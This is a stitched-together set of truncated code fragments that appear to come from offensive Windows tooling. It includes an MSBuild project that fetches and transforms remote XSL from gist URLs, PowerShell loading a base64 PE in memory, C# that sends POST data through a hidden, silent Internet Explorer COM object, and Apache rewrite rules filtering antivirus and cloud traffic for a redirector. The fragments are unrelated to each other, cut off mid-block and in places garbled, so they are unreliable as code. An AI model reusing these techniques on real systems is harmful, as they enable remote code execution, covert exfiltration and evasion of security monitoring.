```powershell
<#
.SYNOPSIS
This script demonstrates the ability to capture and tamper with Web sessions.
For secure sessions, this is done by dynamically writing certificates to match the requested domain.
This is only proof-of-concept, and should be used cautiously, to demonstrate the effects of such an attack.
Function: Interceptor
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
```
```xml
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
  <Target Name="Example">
    <ItemGroup>
      <XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" />
    </ItemGroup>
    <PropertyGroup>
      <XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile>
    </PropertyGroup>
    <XslTransformation
      OutputPaths="output.%(XmlFiles.FileName).html"
```
```text
" </div>"
" })();\r\n"
" && "
" & "
" "
" ''The "
" (""
" (199"
" (200"
" (e.g."
```
```powershell
# Author: Matthew Graeber (@mattifestation)
# Load dnlib with Add-Type first
# dnlib can be obtained here: https://github.com/0xd4d/dnlib
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference
filter Get-AssemblyLoadReference {
    param (
        [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
        [Alias('FullName')]
        [String]
        [ValidateNotNullOrEmpty()]
```
```powershell
$Domain = [AppDomain]::CurrentDomain
$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into.
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
$TypeBuilder.CreateType()
$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA
```
```csv
"Algorithm","Hash","CatalogPath","Hint"
"SHA256","71A0AEC9941BA21780C3BED570AEAF3BC5B9473BB6662F7CAF194F33C0E1B918","C:\Windows\InfusedApps\Frameworks\Microsoft.Advertising.Xaml_10.1705.4.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat",
"SHA256","F5EEEC38876E48617643A9E735A30B9EC3D08D77075CD81F239A15626E3F7DD5","C:\Windows\InfusedApps\Frameworks\Microsoft.Advertising.Xaml_10.1705.4.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat",
"SHA256","4BA33EC224E42FC929BA6487041C2C4275C5BCA66CD89471A09BC7F522A5661F","C:\Windows\InfusedApps\Frameworks\Microsoft.Advertising.Xaml_10.1705.4.0_x86__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat",
"SHA256","71A0AEC9941BA21780C3BED570AEAF3BC5B9473BB6662F7CAF194F33C0E1B918","C:\Windows\InfusedApps\Frameworks\Microsoft.Advertising.Xaml_10.1705.4.0_x86__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat",
"SHA256","29DC48FD41061B58DE61060BA568C5B5C25328B454E84F5FD5C33310E9A501D8","C:\Windows\InfusedApps\Frameworks\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x64__8wekyb3d8bbwe
```
```csharp
// sample function that takes in a destination server, POST data, and custom HTTP request headers
private string SendData(string dst, byte[] postData, string customHeaders)
{
    // CLSID of the InternetExplorer.Application COM object, resolved late-bound
    Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
    object IE = Activator.CreateInstance(com_type);
    object[] falseArr = new object[] { false };
    object[] trueArr = new object[] { true };
    // Hide the browser window and suppress dialog boxes
    com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
    com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);
```
```apache
RewriteEngine On
# Uncomment the below line for verbose logging, including seeing which rule matched.
#LogLevel alert rewrite:trace5
# BURN AV BURN
# AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device
RewriteCond expr "-R '54.0.0.0/8'" [OR]
RewriteCond expr "-R '52.0.0.0/8'" [OR]
```
```vbscript
Const HKLM = &H80000002 'HKEY_LOCAL_MACHINE
strComputer = "."
strKey = "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit"
Set objLocator = CreateObject("WbemScripting.SWbemLocator")
Set objReg = objLocator.ConnectServer(strComputer, "root\cimv2").Get("StdRegProv")
objReg.EnumKey HKLM, strKey, arrSubKeys
' Read the audit policy value that controls command-line logging in process creation events (4688)
objReg.GetDWORDValue HKLM, strKey, "ProcessCreationIncludeCmdLine_Enabled", isenabled
If IsNull(isenabled) Then
```
```powershell
$exepath = "c:\windows"
$searchstrings = @("/url", "/uri", "/wildcard", "/format", "/path")
$skip = @("logoff.exe", "mcrmgr.exe", "audit.exe")
$foundin = @()
$testedbins = @()
Function Execute-Command ($commandPath, $commandArguments)
{
    $pinfo = New-Object System.Diagnostics.ProcessStartInfo
    $pinfo.FileName = $commandPath
```